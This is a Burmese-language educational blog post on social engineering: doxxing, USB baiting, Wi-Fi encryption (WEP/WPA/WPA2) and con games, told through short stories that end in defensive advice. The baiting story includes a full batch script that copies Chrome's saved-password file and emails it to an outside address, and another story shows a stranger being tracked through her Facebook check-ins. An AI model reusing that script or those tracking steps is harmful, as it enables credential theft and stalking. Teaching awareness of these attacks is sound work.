Doxxing (မွတ္တမ္းစုၿခင္း)

Dox ဆုိတဲ့ စကားလံုးက မူရင္း အဂၤလိပ္စာလုံး document (မွတ္တမ္းတင္သည္) ၏ အတုိေကာက္ doc ကို ေဖၚၿပတဲ့ ဗန္းစကားပါ။ တုိက္ခုိက္သူေတြ အတြက္ ေတာ့ လက္ႏွက္တစ္မ်ိဳးေပါ့၊ အရူး သိပၸံပညာရွင္ေတြအတြက္ေတာ့ အရမ္းအဖုိးတန္တဲ့ အေလ့အက်င့္တစ္ခု ေပါ့။ ၎နည္းလမ္းကို တစ္ဦးတစ္ေယာက္ရဲ႕ အခ်က္အလက္ေတြ စုစည္းေလ့လာဖုိ႔ အသံုးၿပဳပါတယ္၊ ထုိသုိ႔ စုစည္းဖုိ႔ ဟက္ၿခင္း၊ social engineer လုပ္ၿခင္း ႏွင့္ လူသိရွင္ၾကား တင္ထားတဲ့ အခ်က္အလက္ေတြႏွင့္ Facebook ကဲ့သုိ႔ လူမႈကြန္ယက္ေတြမွာရွာေဖြၿခင္း စသၿဖင့္  လုပ္ၿခင္းမ်ား ၿဖစ္ပါတယ္။  ဥပေဒဆုိင္ရာ သက္ေသခုိင္လံုေစၿခင္းအတြက္ အကူအညီေပးရန္၊ စီးပြားေရး စိစစ္မႈမ်ားၿပဳလုပ္ရန္၊ အေႏွာက္အယွက္ေပးရန္၊ အယံုသြင္းရန္၊ အြန္လုိင္းတြင္ အရွက္ရေစရန္ စသည့္ ရည္ရြယ္ခ်က္အမ်ိဳးမ်ိဳးအတြက္ Doxing လုပ္ၾကပါတယ္။

ကစားပြဲ စတင္

မင္းေမာင္ေမာင္က ေကာ္ဖီဆုိင္တစ္ခုမွာ ေတြ႔လုိက္တဲ့ေကာင္မေလးတစ္ေယာက္ကို စိတ္၀င္စားမိသြားပါတယ္။ ဒါေပမယ့္ သူအခုမွ စေတြ႔ဖူးတဲ့ မိန္းကေလးတစ္ေယာက္ကုိ ၀င္မိတ္ဆက္ဖုိ႔က သူ႔အတြက္ ခက္ခဲေနခဲ့တာေၾကာင့္ သူမကုိ မိတ္ဆက္ဖုိ႔ သူမအေၾကာင္း အနည္းငယ္ေလာက္သိထားရရင္ ေကာင္းမွပဲလုိ႔ သူစဥ္းစားမိခဲ့တယ္။ ကံအားေလွ်ာ္စြာပဲ၊ အဲဒီေကာင္မေလးက selfie ရိုက္ၿပီး၊ facebook ေပၚမွာ check-in လုပ္ေနတာသူ သတိထားမိလုိက္ပါတယ္။ “ဟုတ္ၿပီ၊ သူမမွာ အခု အားနည္းခ်က္တစ္ခု ရွိသြားၿပီ ‘check-in’ လုပ္လုိက္တာပဲ၊ ေနာက္အားနည္းခ်က္တစ္ခုမ်ား ရႏုိင္မလား ‘public post’ ေလး လုပ္ပါဦး” ဟုေၿပာရင္း အဲဒီ ေကာ္ဖီဆုိင္ရဲ႕ facebook page မွာ check-in လုပ္ထားတဲ့ သူမ အေကာင့္ကုိ သူ ရွာလုိက္ပါတယ္။

ကစားပြဲ ၿပီးဆံုး

ကြ်န္ေတာ္တုိ႔၊ Public post မတင္သင့္သလုိ၊ ကုိယ္ေရာက္ေနတဲ့ ေနရာကုိလည္း လူမႈကြန္ယက္ေပၚမွာ အၿမဲတမ္း မေဖၚၿပသင့္ပါဘူး။ ခင္ဗ်ားကုိ ဘယ္သူမွ doxing လုပ္မေနဘူးလုိ႔၊ ခင္ဗ်ား အၿမဲတမ္း မယံုၾကည္ထားသင့္ပါဘူး။ ဒီအေၾကာင္းအရာကုိအေၿခခံၿပီး  သရုပ္ေဖၚၿပထားတဲ့ လင့္ခ္ေလးတစ္ခုကုိ ေဖၚၿပေပးထားပါတယ္။

 

ဟက္ကာမ်ားအတြက္ စာသင္ေက်ာင္းပါ၊

ဒါေၾကာင့္ ခင္ဗ်ားအတြက္ ေပါ့။

ကြ်န္ေတာ္တုိ႔ မိသားစုမွ ၾကိဳဆုိပါတယ္။

(Starry Sky)

လူသိမ်ားတဲ့ Social Engineering နည္းလမ္းမ်ား

ကြ်မ္းက်င္တဲ့ အင္ဂ်င္နီယာတစ္ေယာက္က လက္ရွိၿပႆနာတစ္ခုကုိ ေၿဖရွင္းဖုိ႔နည္းလမ္းရွာသစ္ေတြရွာေဖြေတြ႔ရွိၿခင္းကုိ ဟက္ကင္း တစ္ခုလုိ႔ေခၚႏုိင္ပါတယ္ – http://schoolforhackers.com/category/hacking-tools/ မွ ကုိးကားေဖၚၿပထားတဲ့ Hack to live ဆုိတဲ့ ေဆာင္းပါးတစ္ခုမွာ ပုိမိုဖတ္ၾကည့္ႏုိင္ပါတယ္။ ေသခ်ာတာက ခင္ဗ်ားလုိခ်င္တာ၊ ၿဖစ္ေစခ်င္တာကုိ ရေအာင္ရယူတဲ့၊ ၿဖစ္ေအာင္လုပ္တဲ့ နည္းလမ္းရွာေဖြ လုိက္တာပဲေပါ့။ အသံုးမ်ားတဲ့ social engineering နည္းလမ္း ၅ ခုေလာက္ေဆြးေႏြးၾကည့္ရေအာင္။

၁။ ငါးစာခ်ၿခင္း (biating)

               ငါးစားခ်ၿခင္းလုိ႔ တင္စားထားတာပါ။ ထုိနည္းလမ္းက ငါးမွ်ားၿခင္းလုိ႔သိႏုိင္တဲ့ Phishing နည္းလမ္းနဲ႔ တူပါတယ္။ အၿခား social engineering ေတြနဲ႔ ကြာၿခားခ်က္ကေတာ့၊ ဟက္ကာက ပစ္မွတ္ကုိ ၿဖားေယာင္းရန္ အသံုးၿပဳတဲ့ အခ်က္ေတြပါပဲ။ baiter ေတြက သီခ်င္းေတြ၊ ရုပ္ရွင္ေတြ အခမဲ့ေဒါင္းလုတ္ လုပ္ႏုိင္ရန္ ကမ္းလွမ္းေပးတတ္ၾကပါတယ္။ ထုိနည္းလမ္းက တုိက္ခိုက္သူေတြက လူေတြရဲ႕ စပ္စုခ်င္စိတ္ ေပၚမွာ ရုပ္၀တၳဳၾကားခံေတြ သံုးၿပီး တုိက္ခုိက္တဲ့ နည္းလမ္းတစ္ခုၿဖစ္ပါတယ္။

ကစားပြဲစတင္

မင္းေမာင္ေမာင္က ယူအက္စ္ဘီ စတစ္ေလးေတြကုိ သူ႔အခန္းေဖါ္ေတြရဲ႕ စားပြဲနားမွာ၊ လက္ေတြ႔ခန္း ၀န္းက်င္မွာ ခ်ထားခဲ့ ပါတယ္။ သူအခန္းေဖၚတစ္ေယာက္က ယူအက္စဘီ စတစ္ေလးကုိ ေကာက္ယူထားၿပီး ဘာေတြမ်ားပါမလဲလုိ႔ သူ႔ လပ္ေတာ့ခ္မွာ ဖြင့္ၾကည့္ လုိက္ပါတယ္ ။  ။  “ဟာ သီခ်င္းေတြအမ်ားၾကီးပဲ၊ ဗြီဒီယုိေတြလည္းပါတယ္၊ ပြတာပဲေဟ့။ ဒီမွာ စိတ္၀င္စားစရာ ဗြီဒီယိုက “ငါ့ အေၾကာင္း” ဆုိပါလား ဖြင့္ၾကည့္လုိက္ဦးမယ္ ဘယ္သူ႔ စတစ္ဆိုတာသိရတာေပါ့။” အခန္းေဖၚက ေရရြတ္ရင္း ဗီြဒီယုိေလးကုိ ဖြင့္ၾကည့္ လုိက္ပါတယ္။ မင္းေမာင္ေမာင္က “အဖုိးေရကြ်န္ေတာ္ အဲဒီ စတစ္ထဲမွာထည့္ထားတဲ့ ဗြီဒီယိုဖုိင္နဲ႔ တဲြခ်ိတ္ထားတဲ့ ငါးမ်ွားခ်ိတ္ကေတာ့ ။ ။ batch ဖုိင္ေလးတစ္ဖုိင္ပါပဲ၊ အဲဒီဖုိင္ထဲမွာ –

@echo off
 
color 08
 
mkdir \a C:\Users\%username%\Documents\sm
 
move /Y sendEmail.exe C:\Users\%username%\Documents\sm
 
PATH=%path%; C:\Users\%username%\Documents\sm
 
cd %appdata%\..\Local\Google\Chrome\”User Data”\Default\
 
xcopy “Login Data” C:\Users\%username%\Documents /S /D /Y /Q /H /C
 
cd C:\Users\%username%\Documents\
 
copy /Y “Login Data” LoginData
 
cd C:\Users\%username%\Documents\sm\
 
sendEmail -f from@gmail.com -u subject -m Message Body -a C:\Users\%username%\Documents\LoginData -t to@gmail.com -s smtp.gmail.com:587 -xu user@gmail.com -xp password -o tls=yes
 
start http://www.animateit.net/data/media/feb2013/love_roses_03.gif

 

ဒီ windows script ေလးတစ္ခ်ိဳ႕ေရးထားတယ္၊ ၿပီးေတာ့ bat to exe ေၿပာင္းၿပီး sendEmail.exe ရယ္၊ ဗီြဒီယိုဖုိင္ တစ္ဖုိင္ရယ္နဲ႔ တြဲ ထားလုိက္တယ္။ သိပ္မၾကာခင္၊ သူ႔ရဲ႕ Google Chrome ထဲက LoginData ဖုိင္ကို ကြ်န္ေတာ္ရေတာ့မယ္၊ တကယ္လုိ႔ သူက browser မွာ စကား၀ွက္ေတြ သိမ္းထားရင္ေတာ့၊ သူ႔ logindata ဖုိင္ကုိ ကြ်န္ေတာ့ Google Chrome Profile ထဲ ထည့္လုိက္ရင္ သူ့ browser မွာ သိမ္းထားတဲ့ စကား၀ွက္ေတြ ရေတာ့မွာေပါ့ဗ်ာ။” လုိ႔ ကြန္ၿပဴတာ ဖန္သားၿပင္ေပၚမွာ စုိက္ၾကည့္ရင္း ေၿပာလုိက္ပါတယ္။

ကစားပြဲၿပီးဆံုး           

 ဒါေပါ့ဗ်ာ၊ ယူအက္စ္ဘီေလး ေကာက္ရတယ္ဆုိၿပီး၊ မစပ္စု သင့္ပါဘူး။ ေဖၚၿပထားတဲ့ script ေလးက၊ အေပ်ာ္တမ္းဆုိေပမယ့္၊ အၿပင္မွာ တစ္ကယ္ရည္ရြယ္ခ်က္ရွိရွိ တုိက္ခုိက္ေနတဲ့ တုိက္ခုိက္သူေတြ တကယ္ရွိေနတယ္ဆုိတာ သတိထားသင့္ပါတယ္။

“ကြ်မ္းက်င္ဟက္ကာေတြအဆိုအရ၊ မဟက္ခံရေအာင္ ဘယ္လုိကာကြယ္မလဲ” ေဆာင္းပါးမွ၊ ဟက္ကင္းဆုိင္ရာ အၾကံၿပဳခ်က္

Backlit keyboard

တီဗြီစတားတစ္ေယာက္ၿဖစ္တဲ့ Kevin Roose ဆုိသူက ဒီကိစၥကုိေမးၿမန္းခဲ့ၿပီး၊ သေဘာေပါက္ခဲ့ပါတယ္။ သူက လူေတြဘယ္လုိ ဟက္ခံရတယ္ ဆိုတာကုိ သုေတသနစစ္တမ္း လုပ္ၿခင္ခဲ့တာေၾကာင့္၊ သူ႔ကုိ ဟက္ရန္ လူသိမ်ားတဲ့ ဟက္ကာတခ်ိဳ႕ကုိ သူကုိယ္တုိင္ဖိတ္ၾကား ဖုိ႔ ဆံုးၿဖတ္ခဲ့ပါတယ္။ ၿပီးေတာ့ သူ႕ကို ဟက္ခဲ့ၾကပါတယ္၊ သူ႔ ၀က္ဘ္ ကင္မရာထဲက၊ (ဓါတ္ပံုေတြကုိ ၂မိနစ္တုိင္း) မွ သူ႔ အြန္လုိင္းအေကာင့္ ေတြအထိ ရသမွ် ခရက္ ခဲ့ၾကတယ္။ ပုဂၢိဳလ္ေရးအရေၿပာရရင္ေတာ့၊ ကြ်န္ေတာ္ဆုိရင္ ဒီလုိမလုပ္ပါဘူး။ ထုိသုိ႔လုပ္ၿခင္းက၊ ဟက္လုပ္ၿခင္း တတ္ေၿမာက္ေရး နဲ႔ လူေတြ ဘယ္လုိ ဟက္ခံရတယ္ ဆုိတာေတြကုိ အသားေပးလြန္းေနပါတယ္၊ အေလးေပးရမွာက ဘယ္လုိေတြ မလုပ္ရဘူး ဆုိတာပါပဲ။

သူအဆုိၿပဳတဲ့ တခ်ိဳ႕ေၿဖရွင္းနည္းေတြက အခန္႔မသင့္ရင္ ႏွစ္ဖက္ခြ်န္ဓါးတစ္ေခ်ာင္းနဲ႔တူတတ္တဲ့ password manager အသံုးၿပဳၿခင္းကဲ့သုိ႔၊ ရင္းႏွီးၿပီးသားေတြပါ။ က်န္တာေတြကေတာ့ ကြ်န္ေတာ့္အတြက္ အသစ္ေတြၿဖစ္ေနတယ္ – Little Snitch ဆုိတဲ့ app တစ္ခုကုိ ခင္ဗ်ား ၾကားဖူးပါသလား? အဲဒီ app က၊ ခင္ဗ်ားရဲ႕ outgoing traffic ကုိ သံသရျဖစ္စရာ လႈပ္ရွားမႈေတြ ရွိ၊မရွိ ေစာင့္ၾကည့္ေပးပါတယ္။ (ကြ်န္ေတာ့္ ကြန္ၿပဴတာက ကြ်န္ေတာ့္ credit card ရဲ႕ စာရင္းရွင္းတမ္းေတြကုိ ဘာေၾကာင့္ တရုတ္သို႔ ပုိ႔ေနတာလဲ?)

ၿပီးေတာ့ တခ်ို႕ “အေၿဖမ်ား” က အသံုးၿပဳသူေတြက ကိုယ့္ကုိယ္ကုိ ကာကြယ္ဖုိ႔ၾကိဳးစားရင္း ခ်ိဳးဖ်က္၀င္ေရာက္သူေတြအတြက္ အက်ိဳးရွိ သြားေစတာမ်ုိး ၿဖစ္တတ္ပါတယ္ – ဥပမာ – VPN အသံုးၿပဳတာမ်ိုးေပါ့။  ေရွ႕ေလွ်ာက္ ဒီကိစၥနဲ႔ ပတ္သတ္ၿပီး၊ ခင္ဗ်ားပုိသိရမွာပါ။ အခု လတ္တေလာအတြက္ေတာ့ အလားအလာရွိတဲ့ ခရက္ကာေတြ၊ ဟက္ကာေတြ နဲ႔ လံုၿခံဳေရး ကြ်မ္းက်င္ေတြ အတြက္ ဤေဆာင္းပါးကုိ ဖတ္ၾကည့္ေပးပါ။ (Image courtesy of User: Colin at wikimedia.org)

ခင္ဗ်ားက သေဘာေကာင္းလြန္းတဲ့သူလား၊ လံုၿခံဳေရးကုိ ဂရုစုိက္တတ္တဲ့သူလား?

are you that goodခင္ဗ်ား ထုတ္ထားတဲ့ၾကိဳးမဲ့ကြန္ယက္ကုိ ခင္ဗ်ားအိမ္နီးခ်င္းၿမင္တဲ့အခါ၊ သူပထမဆံုး စဥ္းစားတာက “ဟာ ေဘးအိမ္က wifi မိေနပါလား၊ ကံေကာင္းရင္ေတာ့ အခမဲ့အင္တာနက္သံုးခြင့္ရမွာပဲ” လုိ႕စဥ္းစားရင္း ။ ။ ကလစ္!
ဒါဆုိ ခင္ဗ်ားသေဘာကေရာ? ခင္ဗ်ားရဲ႕ wifi ကုိ၊ အားလံုးကုိေပးသံုးခ်င္သလား? ဒါမွမဟုတ္၊ တစ္ဦးတည္း သီးသန္႕ထားၿပီးသံုးခ်င္တာလား၊ ဒါမွမဟုတ္၊ သံုးခြင့္ေပးမည့္သူကုိ ေရြးခ်ယ္ကန္႕သတ္ၿပီး၊ ေ၀မွ်သံုးခ်င္တာလား? ခင္ဗ်ားရဲ႕ ၾကိဳးမဲ့ကြန္ယက္လံုၿခံဳေရးအတြက္ စိတ္ပူတယ္ဆုိရင္ေတာ့၊ ခင္ဗ်ားရဲ႕ ၾကိဳးမဲ့ကြန္ယက္ကုိ ကာကြယ္ထားသင့္ပါတယ္။ ခင္ဗ်ား ကြန္ယက္ထဲကုိ ၀င္လာတဲ့သူအားလံုးက၊ ခင္ဗ်ား မွ်ေပးထားတဲ့၊ အင္တာနက္အသံုးၿပဳ ခြင့္ရဖုိ႕ ရည္ရြယ္ခ်က္တစ္ခုတည္းရွိတာမဟုတ္ပါဘူး။
စင္ဒရဲလား၊ ရုပ္ရွင္ထဲမွာ မင္းသားေလးက၊ မည္သည့္ပိ်ဳကညာမဆုိတက္ေရာက္ႏုိင္တဲ့၊ ၾကင္ယာဖက္ေရြးတဲ့ ပါတီေလးတစ္ခုကုိ က်င္းပ လုိက္ပါတယ္၊ ဒါေပမယ့္ သူရည္စူးခဲ့တာ စင္ဒရဲလားမင္းသမီးေလးတစ္ေယာက္တည္းကုိပါ။ ကံမေကာင္းစြာနဲ႕ စင္ဒရဲလားေလးရဲ႕ မေထြးႏွစ္ေယာက္ တက္ေရာက္ခဲ့ၾကတယ္။ သူတုိ႕ရဲ႕ မိခင္လုပ္သူက နန္းတြင္းထဲလုိက္ပါလာၿပီး အတြင္းသတင္းေတြကုိ၊ ခုိးနားေထာင္ၿပီး ေတာ္၀င္မူးမတ္ကို အၾကပ္ကုိင္ၿခိမ္းေၿခာက္ခဲ့ပါတယ္။ ဒါေၾကာင့္ ဒီပြဲကုိ တက္ေရာက္လာတဲ့ သူတုိင္းက မင္းသားေလးရဲ႕ ဧည့္ခံပြဲကုိ ဆင္ႏႊဲဖုိ႕ ရည္ရြယ္ခ်က္တစ္ခုတည္း မဟုတ္ပါဘူး၊ ေနာက္ကြယ္မွာ၊ အက်ိဳးအၿမတ္အတြက္ ရည္ရြယ္ခ်က္ေတြရွိေနပါတယ္။
ဇာတ္လမ္းၾကည့္ေနရင္းမွ၊ မင္းေမာင္ေမာင္က ရုတ္တရက္ထၿပီး “အဖုိးေရ၊ ကြ်န္ေတာ္တုိ႕ wifi ကုိ၊ အားလံုးေပးသံုးလုိ႕ေတာ့ မၿဖစ္ေတာ့ဘူး၊ ကြ်န္ေတာ္တုိ႕ကာကြယ္မႈေေတြလုပ္သင့္တယ္။” လုိ႕ေၿပာလိုက္ပါတယ္။ အဖုိးက “ကာကြယ္မႈေတြကဘယ္လုိလုပ္ရမွာလဲ၊ ငါ့ သံေသတၱာထဲမွာ ထည့္ထားလုိက္ရင္ ရမလား?” “အဲလုိကာကြယ္တာကုိေၿပာတာမဟုတ္ဘူးဗ်၊ အဖုိးရဲ႕ စမတ္ဖုန္းနဲ႕၊ ကြ်န္ေတာ့္ laptop က အင္တာနက္လိုင္းတစ္ခု တည္းကုိ မွ်ၿပီးသံုးခြင့္ရေနဖုိ႕ေတာ့၊ wifi ကိုလႊင့္ထားဖုိ႕လုိတယ္ေလ၊ ဒါေပမယ့္ ကြ်န္ေတာ္တုိ႕ႏွစ္ေယာက္ကလြဲၿပီး တၿခားသူေတြ ၀င္လုိ႕မရေအာင္ ကာကြယ္ရမွာဗ်။” လုိ႕ မင္းေမာင္ေမာင္က ေၿပာလုိက္ပါတယ္။ “ဒီမွာၾကည့္၊ ကာကြယ္မႈေတြအမ်ားၾကီးေရြးလုိ႕ရတယ္၊ တုိက္ခိုက္မႈအမ်ိဳးအစားအမ်ိဳးမ်ိဳး ကုိလည္းေတာ္ေတာ္မ်ားမ်ား ကာကြယ္ထားလုိ႕ရတဲ့၊ firewall ၿပင္ဆင္မႈေတြေတာင္လုပ္လုိ႕ရေသးတယ္ဗ်။” လုိ႕ သူ႕ရဲ႕ browser မွတဆင့္၊ wifi စက္ေလးထဲ ၀င္ၿပရင္း၊ အဖုိးကုိေၿပာလုိက္ပါတယ္။” ၿပီးေတာ့ဆက္ၿပီး “ဒီမွာ wep ၊ wpa ၊ wpa2 ဆုိတဲ့ ကာကြယ္မႈေတြရွိတယ္ဗ်။”လုိ႕ေၿပာလုိက္ပါ တယ္။ အဖုိးက၊ “အဲ၊ ဘာေတြ?” “ကြ်န္ေတာ္ရွင္းၿပပါမယ္၊ wep ဆိုတာ၊ wired equivalent privacy ၊ IEEE 802.11 လုိ႕ေခၚတဲ့ ၾကိဳးမဲ့ကြန္ယက္ ေတြအတြက္ လံုၿခဳံေရးဆုိင္ရာ အယ္လဂိုရီသမ္ တစ္ခုပါ။ ၎ကို၊ hexadecimal (သုိ႕) အေၿခ ၁၆ ရွိ၊ နံပါတ္စနစ္ ၁၀ (သုိ႕) ၂၆ လံုးၿဖင့္ ဖြဲ႕ပံုေဖၚထားပါတယ္။ အေၿခခံ wep encrypt နည္းလမ္းက – (IV) လုိ႕ေခၚတဲ့ initialization vector (က်ပန္းနံပါတ္) ေတြနဲ႕ ရိုက္ထည့္လိုက္တဲ့ wep key ေတြကုိ ေပါင္း၍၊ RC4 လုိ႕ေခၚတဲ့ encryption လုပ္တဲ့ အယ္လဂိုရီသမ္ (cyper/ciper) ကုိသံုးၿပီး ရလာတဲ့ keystream ကုိ IV ေပၚမွာမူတည္ၿပီး၊ ထုတ္ေပးထားတဲ့၊ plaintext ေတြနဲ႕ Exclusive OR gate ကုိၿဖတ္၍ (encrypted လုပ္ၿပီးသား) ciper text ေတြရလာပါတယ္။ ၎ကို 64-bit encryption မွ 128-bit အထိ တုိးခ်ဲ႕အသံုးၿပဳႏုိင္ခဲ့ေပမယ့္၊ ၂၀၀၃ ခုႏွစ္ပုိင္း မွာေတာ့၊ WEP အား၊ WPA (Wifi- Protected Access) လံုၿခံဳေရးစနစ္ၿဖင့္၊ အစားထုိးလုိက္ၿပီလုိ႕၊ Wi-Fi Alliance ကေၾကၿငာခဲ့ပါတယ္။ ဒါဆုိ WPA ဆုိတာ ဘာလဲ? WPA ကုိ တစ္ခါတစ္ရံ IEEE 802.11i (IEEE 802.11 အားၿဖည့္စြက္ၿပင္ဆင္ထားေသာ) မူၾကမ္း စံခ်ိန္အၿဖစ္လည္း ရည္ညႊန္းပါတယ္။ ၎ကုိ ပုိမိုလံုၿခံဳတဲ့၊ ပုိမုိ ရႈပ္ေထြးတဲ့ ၊ WPA2 အထိ ၾကိဳတင္ ေမွ်ာ္မွန္းခဲ့ၾကပါတယ္။ WPA2 ကို ၂၀၀၄ ခုႏွစ္မွာ စတင္အသံုးၿပဳႏုိင္ခဲ့ပါတယ္။ WEP က ကြန္ယက္ခ်ိတ္ဆက္မႈအစဥ္အလာၿဖစ္တဲ့ wired ကြန္ယက္လံုၿခံဳေရးၿဖင့္ယွဥ္လွ်က္၊ အခ်က္အလက္စိတ္ခ်ႏိုင္မႈကုိ အေထာက္အကူၿဖစ္ေစခဲ့ၿပီး၊ WPA ကိုေတာ့၊ ၾကိဳးမဲ့ကြန္ယက္ခ်ိတ္ဆက္မႈအတြက္ သီးသန္႕အသံုးၿပဳရန္ ပံုစံခ်ထုတ္လုပ္ခဲ့တာပါ။ WPA ၿပင္ဆင္ၿခင္းမွာ၊ အမ်ားအားၿဖင့္ WPA-PSK (Pre-shared Key) ကုိ အေၿခခံအားၿဖင့္ သံုးၾကပါတယ္၊ ၎က 256-bit key encryption ကုိ အသံုးၿပဳပါတယ္။ ၿပီးေတာ့၊ တုိက္ခုိက္သူတစ္ေယာက္ေယာက္က၊ access point နဲ႕ client ၾကားက packet ေတြကို ရယူထားလား၊ ၿပင္ဆင္ထားလား ဆုိတာေတြ စစ္ေဆးေပးတဲ့ message integrity check စနစ္လည္းပါ၀င္လာတယ္။ WPAII မွာ၊ WPA နဲ႕ ကြာၿခားတဲ့တုိးတက္ေၿပာင္းလဲမႈတစ္ခု ကေတာ့၊ Advanced Encryption Standard (AES) ကုိ မၿဖစ္မေန သံုးရတာပါပဲ။” လုိ႕ ဆက္ၿပီးရွင္းၿပခဲ့ပါတယ္။ အဖုိးကေတာ့ “ေခါင္းေတြမူးလုိက္တာ၊ ကာကြယ္မယ္ဆုိလည္း၊ ၿမန္ၿမန္ကာပါေတာ့” လုိ႔ေၿပာခဲ့ပါတယ္။ ဆက္ၿပီး “ဒါနဲ႕၊ WPA ဆုိတာနဲ႕ ကာကြာ၊ သူ႕ ၾကည့္ရတာ ပုိလံုၿခဳံမယ့္ပံုပဲ။” လုိ႕ဆက္ ေၿပာခဲ့ပါတယ္။ အဖုိးသေဘာေပါက္သြားပံုရပါတယ္။ အဖုိးအတြက္ေတာ့ ဒီလုိေျမးေလးရွိေနတာ အားရစရာပါပဲ။
ဟုတ္ပါတယ္၊ လူငယ္ေတြမွာ ထက္ၿမတ္တဲ့ အရည္အေသြးေတြရွိၾကပါတယ္။ သူတုိ႕ရဲ႕ စိတ္ကူးေတြကုိ အေကာင္းဆံုး ပံုေဖၚႏုိင္ေအာင္ ကြ်န္ေတာ္တုိ႕က ပံ့ပိုးေပးဖုိ႕ လုိပါတယ္။ သူတုိ႕ကုိ ဘယ္လုိလုပ္ရမယ္ဆုိတာေၿပာၿပၿခင္းထက္၊ ဘာေတြလုပ္လုိ႕ရတယ္၊ အက်ိဳးဆက္ေတြက ဘာေတြ ၿဖစ္လာႏုိင္တယ္၊ ဆုိတာေတြ ေၿပာၿပေပးႏုိင္ဖုိ႕ ပုိမုိလုိအပ္ပါတယ္။ သူတုိ႕ရဲ႕၊ ဉာဏ္ကြန္႕ၿမဴးမႈေတြကုိ တားဆီးေနရင္၊ စိတ္ကူးေကာင္း မေၿပာနဲ႕၊ ဘာေၾကာင့္ဆုိတာေတာင္ သူတုိ႕ေတာ္ေတာ္ စဥ္းစားေနရပါလိမ့္မယ္။ Hacker Highschool ရဲ႕ အဓိက ရည္ရြယ္ခ်က္ကလည္း၊ လူငယ္ေတြကုိ မာန္မာနကင္းစြာၿဖင့္၊ အေကာင္းဆံုးစဥ္းစား၊ ပံုေဖၚတတ္ၿပီး ၿမင့္မားလာေစရန္၊ ရည္ရြယ္ထားပါတယ္။ ကြ်န္ေတာ္တုိ႕ပတ္၀န္းက်င္မွာလည္း၊ မင္းေမာင္ေမာင္က အဖုိးကုိ ကူညီေပးသလုိ၊ ကြ်န္ေတာ္တုိ႕ကုိ နည္းပညာေတြအေပၚမွာ ေကာင္းစြာ အသံုးၿပဳႏုိင္ရန္၊ အနည္းဆံုး၊ စက္ပစၥည္းတစ္ခုကုိ မွန္ကန္တဲ့ေစ်းႏႈန္းနဲ႕၀ယ္ယူႏုိင္ရန္၊ ကူညီေပးႏိုင္မယ့္ သူတစ္ေယာက္ရွိေနဖုိ႕ လုိအပ္ပါတယ္။
အခုေတာ့ မင္းေမာင္ေမာင္က၊ ေက်ာင္း conference တစ္ခုမွာ ၿပသဖုိ႕ ၿပင္ပကၿဖစ္ရပ္တစ္ခုေပၚမွာအေၿခခံထားတဲ့ presentation တစ္ခုကုိ ဖန္တီးေနပါတယ္။ “ရုိက္စားလုပ္တဲ့ အုိင္တီငနဲ” လုိ႕ ေခါင္းစည္း စတင္လုိက္ပါတယ္။ ။

 

လူူမႈေရး ဇာတ္လမ္းဆင္ၿခင္း

SE

လူူမႈေရး ဇာတ္လမ္းဆင္ၿခင္းဆုိတာ၊ လူေတြရဲ႕ စိတ္ဓါတ္ေရးရာၾကိဳးကုိင္ၿခင္းလုိ႕ အတိုခ်ံဳးသိႏုိင္ပါတယ္၊ တရား၀င္တဲ့ လိမ္လည္ၿခင္းေပါ့၊ ဒါေပမယ့္ ရုပ္ရွင္ရံုလုိ လူထူတဲ့ေနရာေတြမွာ “မီးဗ်ိဳ႕” လုိ႕ေတာ့ မေအာ္နဲ႕ေပါ့ဗ်ာ။

“ဟုတ္တယ္ ဒါက တုိက္ခုိက္မႈပံုစံ တစ္ခုပါ၊ ၎က လူေတြရဲ႕ တံု႕ၿပန္မႈေပၚမွာ အၿပည့္အ၀နီးပါး မူတည္ပါတယ္၊ လူေတြကုိ လွည့္စားၿခင္း၊ ဖိအားေပးၿခင္းေတြ ဒါမွမဟုတ္ သူတုိ႔ရဲ႕ ရူးသြတ္မႈေတြကုိ အသံုးခ်ၿခင္းေတြ လုပ္တာေပါ့။ social engineering လုိ႔ပဲ ေခၚၾကရေအာင္ဗ်ာ” လုိ႔ မင္းေမာင္ေမာင္က အဖုိးကုိေၿပာၿပေနပါတယ္။

“ယံုၾကည္မူၿပုိင္ပဲြ (con game)တစ္ခု ေပါ့ဗ်ာ။ ဥပမာ – တုိက္ခုိက္သူက ရံုးထဲကုိ အေရးတၾကီး ၀င္ဖုိ႔လုိေနတဲ့ လုပ္ေဖၚကုိင္ဖက္ တစ္ေယာက္လုိ ဟန္ေဆာင္ၿပီး ရံုး၀န္ထမ္းတစ္ေယာက္ေယာက္ကုိ အယံုသြင္းၿပီး ရံုးခန္းတံခါးဖြင့္ေပးဖုိ႔ အကူအညီေတာင္းတာမ်ုိးေပါ့။” လုိ႔ဆက္ေၿပာလုိက္ပါတယ္။ အဖုိးက “ဒါက လိမ္တာပဲေပါ့၊ လူလိမ္တစ္ေယာက္နဲ႔ ဘာကြာသြားလုိ႔လဲကြ။” လုိ႔ ၿပန္ေမးခဲ့ပါတယ္။

“လူလိမ္လုိမ်ုိးေတာ့ မဟုတ္ဘူးဗ်၊ ကုိယ္လုိခ်င္တာကုိ သြယ္၀ုိက္တဲ့ နည္းလမ္းနဲ႔ ရေအာင္ယူတာလုိ႔ ေၿပာလုိ႔ရတယ္၊ ဘာေၾကာင့္လဲဆုိေတာ့ တစ္ခါတစ္ရံ အရမ္းသိမ္ေမြ႔တဲ့ နည္းလမ္းမ်ုိးေတြလည္းရွိလုိ႔ပါ။ ကြ်န္ေတာ္ ထင္ရွားတဲ့ ဥပမာ တစ္ခုေၿပာၿပမယ္ဗ်ာ။ Catch Me If You Can ဆုိတဲ့ ဇာတ္ကားမွာ social engineering နဲ႔ ပက္သတ္လုိ႔ ေတာ္ေတာ္ၾကည့္ရတယ္ဗ်။ ဖရန့္ခ္ရဲ႕ အေဖက ဖရန္႔ခ္ ကုိ အေမရိကန္မွာ ယမ္းကီးေတြဘာေၾကာင့္အၿမဲႏုိင္လဲလုိ႔ေမးခဲ့တယ္။ ဖရန္႕ကေတာ့ ရိုးရိုးေလး စဥ္းစားၿပီး သူတုိ႔မွာ မစ္ကီ မန္တယ္လ္ ရွိေနလုိ႔ေလလုိ႔ ေၿဖခဲ့တယ္။ ဒါေပမယ့္ ဖရန္႔အေဖကေတာ့။ ။ မဟုတ္ဘူး၊ သူတုိ႔အၿမဲႏုိင္တာ၊ ၿပုိင္ဖက္အသင္းက သူတုိ႔ အကၤ်ီေပၚက အစင္းေသးေသးေလးေတြကုိ အၿမဲစုိက္ၾကည့္ မိေနလုိ႔ပဲ လုိ႔ေၿပာခဲ့ပါတယ္။

